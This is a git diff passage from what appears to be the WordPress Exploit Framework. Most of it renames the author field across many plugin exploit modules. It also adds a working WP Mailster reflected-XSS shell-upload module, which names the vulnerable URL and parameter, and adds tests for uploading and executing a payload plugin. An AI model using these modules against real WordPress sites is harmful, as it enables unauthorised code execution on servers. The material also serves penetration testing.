-        'Sipke Mellema',                  # Disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Sipke Mellema', # Disclosure
+        'rastating'      # WPXF module
       ],
       references: [
         ['WPVDB', '8653'],
diff --git a/modules/exploits/wp_live_chat_support_reflected_xss_shell_upload.rb b/modules/exploits/wp_live_chat_support_reflected_xss_shell_upload.rb
index d32bcc9..8dba510 100644
--- a/modules/exploits/wp_live_chat_support_reflected_xss_shell_upload.rb
+++ b/modules/exploits/wp_live_chat_support_reflected_xss_shell_upload.rb
@@ -10,8 +10,8 @@ def initialize
     update_info(
       name: 'WP Live Chat Support <= 7.0.06 Reflected XSS Shell Upload',
       author: [
-        'Chris Liu',                      # Discovery
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Chris Liu', # Discovery
+        'rastating'  # WPXF module
       ],
       references: [
         ['WPVDB', '8843'],
diff --git a/modules/exploits/wp_live_chat_support_stored_xss_shell_upload.rb b/modules/exploits/wp_live_chat_support_stored_xss_shell_upload.rb
index 97cd035..5d1726e 100644
--- a/modules/exploits/wp_live_chat_support_stored_xss_shell_upload.rb
+++ b/modules/exploits/wp_live_chat_support_stored_xss_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'WP Live Chat Support <= 7.1.04 Stored XSS Shell Upload',
       author: [
-        'Omaid Faizyar',                  # Disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Omaid Faizyar', # Disclosure
+        'rastating'      # WPXF module
       ],
       references: [
         ['WPVDB', '8880'],
diff --git a/modules/exploits/wp_mailster_reflected_xss_shell_upload.rb b/modules/exploits/wp_mailster_reflected_xss_shell_upload.rb
new file mode 100644
index 0000000..32286ab
--- /dev/null
+++ b/modules/exploits/wp_mailster_reflected_xss_shell_upload.rb
@@ -0,0 +1,38 @@
+# frozen_string_literal: true
+
+class Wpxf::Exploit::WpMailsterReflectedXssShellUpload < Wpxf::Module
+  include Wpxf::WordPress::ReflectedXss
+
+  def initialize
+    super
+
+    update_info(
+      name: 'WP Mailster <= 1.5.4 Reflected XSS Shell Upload',
+      author: [
+        'Ricardo Sanchez', # Dislosure
+        'rastating'        # WPXF module
+      ],
+      references: [
+        ['CVE', '2017-17451'],
+        ['WPVDB', '8973']
+      ],
+      date: 'Dec 05 2017'
+    )
+  end
+
+  def check
+    check_plugin_version_from_changelog('wp-mailster', 'readme.txt', '1.5.5')
+  end
+
+  def vulnerable_url
+    normalize_uri(wordpress_url_plugins, 'wp-mailster', 'view', 'subscription', 'unsubscribe2.php')
+  end
+
+  def xss_payload
+    url_encode("<script>#{xss_ascii_encoded_include_script}</script>")
+  end
+
+  def url_with_xss
+    "#{vulnerable_url}?mes=#{xss_payload}"
+  end
+end
diff --git a/modules/exploits/wp_marketplace_shell_upload.rb b/modules/exploits/wp_marketplace_shell_upload.rb
index f088263..22fc0ea 100644
--- a/modules/exploits/wp_marketplace_shell_upload.rb
+++ b/modules/exploits/wp_marketplace_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'WP Marketplace Unauthenticated Shell Upload',
       author: [
-        'White Fir Design',               # Discovery and disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'White Fir Design', # Discovery and disclosure
+        'rastating'         # WPXF module
       ],
       references: [
         ['WPVDB', '8642'],
diff --git a/modules/exploits/wp_members_reflected_xss_shell_upload.rb b/modules/exploits/wp_members_reflected_xss_shell_upload.rb
index 623b300..6ec18f1 100644
--- a/modules/exploits/wp_members_reflected_xss_shell_upload.rb
+++ b/modules/exploits/wp_members_reflected_xss_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'WP-Members <= 3.1.7 Reflected XSS Shell Upload',
       author: [
-        'Chris Liu',                      # Discovery
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Chris Liu', # Discovery
+        'rastating'  # WPXF module
       ],
       references: [
         ['WPVDB', '8858'],
diff --git a/modules/exploits/wp_mobile_detector_rfi_shell_upload.rb b/modules/exploits/wp_mobile_detector_rfi_shell_upload.rb
index 65534dd..1ff2a70 100644
--- a/modules/exploits/wp_mobile_detector_rfi_shell_upload.rb
+++ b/modules/exploits/wp_mobile_detector_rfi_shell_upload.rb
@@ -15,8 +15,8 @@ def initialize
             'the resize.php script. This exploit only works when the PHP '\
             'option "allow_url_fopen" is enabled (disabled by default in most cases).',
       author: [
-        'White Fir Design',                # Vulnerability disclosure
-        'Rob Carr <rob[at]rastating.com>'  # WPXF module
+        'White Fir Design', # Vulnerability disclosure
+        'rastating'         # WPXF module
       ],
       references: [
         ['URL', 'https://www.pluginvulnerabilities.com/2016/05/31/aribitrary-file-upload-vulnerability-in-wp-mobile-detector/'],
diff --git a/modules/exploits/wp_piwik_stored_xss_shell_upload.rb b/modules/exploits/wp_piwik_stored_xss_shell_upload.rb
index 0064912..a91fe0d 100644
--- a/modules/exploits/wp_piwik_stored_xss_shell_upload.rb
+++ b/modules/exploits/wp_piwik_stored_xss_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'WP-Piwik <= 1.0.10 Unauthenticated Stored XSS Shell Upload',
       author: [
-        'White Fir Design',               # Disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'White Fir Design', # Disclosure
+        'rastating'         # WPXF module
       ],
       references: [
         ['WPVDB', '8613'],
diff --git a/modules/exploits/wp_statistics_12.0.9_reflected_xss_shell_upload.rb b/modules/exploits/wp_statistics_12.0.9_reflected_xss_shell_upload.rb
index e8d79fe..8ef423f 100644
--- a/modules/exploits/wp_statistics_12.0.9_reflected_xss_shell_upload.rb
+++ b/modules/exploits/wp_statistics_12.0.9_reflected_xss_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'WP Statistics <= 12.0.9 Reflected XSS Shell Upload',
       author: [
-        'LoRexxar',                       # Dislosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'LoRexxar',  # Dislosure
+        'rastating'  # WPXF module
       ],
       references: [
         ['WPVDB', '8866'],
diff --git a/modules/exploits/wp_statistics_reflected_xss_shell_upload.rb b/modules/exploits/wp_statistics_reflected_xss_shell_upload.rb
index beb4a0b..7a7fce0 100644
--- a/modules/exploits/wp_statistics_reflected_xss_shell_upload.rb
+++ b/modules/exploits/wp_statistics_reflected_xss_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'WP Statistics <= 12.0.8.1 Reflected XSS Shell Upload',
       author: [
-        'Ryan Dewhurst',                  # Dislosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Ryan Dewhurst', # Dislosure
+        'rastating'      # WPXF module
       ],
       references: [
         ['WPVDB', '8855'],
diff --git a/modules/exploits/wp_support_plus_responsive_ticket_system_shell_upload.rb b/modules/exploits/wp_support_plus_responsive_ticket_system_shell_upload.rb
index 7a8a90c..0da77b1 100644
--- a/modules/exploits/wp_support_plus_responsive_ticket_system_shell_upload.rb
+++ b/modules/exploits/wp_support_plus_responsive_ticket_system_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'WP Support Plus Responsive Ticket System <= 8.0.7 Unauthenticated Shell Upload',
       author: [
-        'Robert Mathews',                 # Discovery and disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Robert Mathews', # Discovery and disclosure
+        'rastating'       # WPXF module
       ],
       references: [
         ['WPVDB', '8949']
diff --git a/modules/exploits/wp_v4.3_shortcode_xss_shell_upload.rb b/modules/exploits/wp_v4.3_shortcode_xss_shell_upload.rb
index 0b8810c..49d7e2a 100644
--- a/modules/exploits/wp_v4.3_shortcode_xss_shell_upload.rb
+++ b/modules/exploits/wp_v4.3_shortcode_xss_shell_upload.rb
@@ -18,9 +18,9 @@ def initialize
             'a new admin user which will be used to upload and execute the '\
             'selected payload in the context of the web server.',
       author: [
-        'Shahar Tal',                     # Discovery and disclosure
-        'Netanel Rubin',                  # Discovery and disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Shahar Tal',    # Discovery and disclosure
+        'Netanel Rubin', # Discovery and disclosure
+        'rastating'      # WPXF module
       ],
       references: [
         ['CVE', '2015-5714'],
diff --git a/modules/exploits/wp_v4.4_xss_shell_upload.rb b/modules/exploits/wp_v4.4_xss_shell_upload.rb
index 70e480f..6999d55 100644
--- a/modules/exploits/wp_v4.4_xss_shell_upload.rb
+++ b/modules/exploits/wp_v4.4_xss_shell_upload.rb
@@ -14,8 +14,8 @@ def initialize
             'a new admin user which will be used to upload and execute the '\
             'selected payload in the context of the web server.',
       author: [
-        'Crtc4L',                         # Discovery and disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Crtc4L',    # Discovery and disclosure
+        'rastating'  # WPXF module
       ],
       references: [
         ['CVE', '2016-1564'],
diff --git a/modules/exploits/wp_whois_domain_reflected_xss_shell_upload.rb b/modules/exploits/wp_whois_domain_reflected_xss_shell_upload.rb
index 332df93..d9d70dc 100644
--- a/modules/exploits/wp_whois_domain_reflected_xss_shell_upload.rb
+++ b/modules/exploits/wp_whois_domain_reflected_xss_shell_upload.rb
@@ -9,7 +9,7 @@ def initialize
     update_info(
       name: 'WP Whois Domain Reflected XSS Shell Upload',
       author: [
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'rastating' # WPXF module
       ],
       references: [
         ['WPVDB', '8683'],
diff --git a/modules/exploits/wpshop_shell_upload.rb b/modules/exploits/wpshop_shell_upload.rb
index a745ce5..d6f7691 100644
--- a/modules/exploits/wpshop_shell_upload.rb
+++ b/modules/exploits/wpshop_shell_upload.rb
@@ -13,8 +13,8 @@ def initialize
             'allows unauthenticated users to upload and execute PHP scripts '\
             'in the context of the web server.',
       author: [
-        'g0blin',                         # Vulnerability discovery
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'g0blin',    # Vulnerability discovery
+        'rastating'  # WPXF module
       ],
       references: [
         ['WPVDB', '7830'],
diff --git a/modules/exploits/wpsolr_reflected_xss_shell_upload.rb b/modules/exploits/wpsolr_reflected_xss_shell_upload.rb
index 5b436bb..0c0e3a5 100644
--- a/modules/exploits/wpsolr_reflected_xss_shell_upload.rb
+++ b/modules/exploits/wpsolr_reflected_xss_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'WPSOLR <= 8.6 Reflected XSS Shell Upload',
       author: [
-        'Larry W. Cashdollar',            # Discovery
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Larry W. Cashdollar', # Discovery
+        'rastating'            # WPXF module
       ],
       references: [
         ['WPVDB', '8445'],
diff --git a/modules/exploits/wptouch_authenticated_shell_upload.rb b/modules/exploits/wptouch_authenticated_shell_upload.rb
index 581d9a0..cad73cb 100644
--- a/modules/exploits/wptouch_authenticated_shell_upload.rb
+++ b/modules/exploits/wptouch_authenticated_shell_upload.rb
@@ -13,8 +13,8 @@ def initialize
             'of any level (e.g. subscriber) to upload and execute PHP scripts '\
             'in the context of the web server.',
       author: [
-        'Marc-Alexandre Montpas',         # Vulnerability discovery
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Marc-Alexandre Montpas', # Vulnerability discovery
+        'rastating'               # WPXF module
       ],
       references: [
         ['URL', 'http://blog.sucuri.net/2014/07/disclosure-insecure-nonce-generation-in-wptouch.html'],
diff --git a/modules/exploits/wsecure_lite_shell_upload.rb b/modules/exploits/wsecure_lite_shell_upload.rb
index a1f32e5..9bb162a 100644
--- a/modules/exploits/wsecure_lite_shell_upload.rb
+++ b/modules/exploits/wsecure_lite_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'wSecure Lite <= 2.3 Shell Upload',
       author: [
-        'White Fir Design',               # Disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'White Fir Design', # Disclosure
+        'rastating'         # WPXF module
       ],
       references: [
         ['WPVDB', '8594'],
diff --git a/spec/wordpress/plugin_spec.rb b/spec/wordpress/plugin_spec.rb
index a1d4544..c5171fd 100644
--- a/spec/wordpress/plugin_spec.rb
+++ b/spec/wordpress/plugin_spec.rb
@@ -89,4 +89,37 @@
       expect(res).to be false
     end
   end
+
+  describe '#wordpress_upload_and_execute_payload_plugin' do
+    context 'when the plugin fails to upload' do
+      it 'returns nil' do
+        res = subject.wordpress_upload_and_execute_payload_plugin('', '', '')
+        expect(res).to be_nil
+      end
+    end
+
+    context 'when the execution returns status 200' do
+      let(:code) { 200 }
+      let(:body) { 'res content' }
+      it 'emits the response content' do
+        allow(subject).to receive(:wordpress_upload_payload_plugin).and_return true
+
+        emitted_content = false
+        allow(subject).to receive(:emit_success) do |p1|
+          emitted_content = p1 == 'Result: res content'
+        end
+
+        subject.wordpress_upload_and_execute_payload_plugin('', '', '')
+        expect(emitted_content).to be true
+      end
+    end
+
+    context 'when the payload is executed' do
+      it 'returns the HttpResponse of the payload request' do
+        allow(subject).to receive(:wordpress_upload_payload_plugin).and_return true
+        res = subject.wordpress_upload_and_execute_payload_plugin('', '', '')
+        expect(res).to be_kind_of Wpxf::Net::HttpResponse
+      end
+    end
+  end
 end
diff --git a/spec/wordpress/urls_spec.rb b/spec/wordpress/urls_spec.rb
index a468c39..5e9e808 100644
--- a/spec/wordpress/urls_spec.rb
+++ b/spec/wordpress/urls_spec.rb
@@ -181,4 +181,11 @@
       expect(subject.wordpress_url_comments_post).to eq url
     end
   end
+
+  describe '#wordpress_url_admin_options' do
+    it 'returns the admin / plugin options URL' do
+      url = 'http://127.0.0.1/wp/wp-admin/admin.php'
+      expect(subject.wordpress_url_admin_options).to eq url
+    end
+  end
 end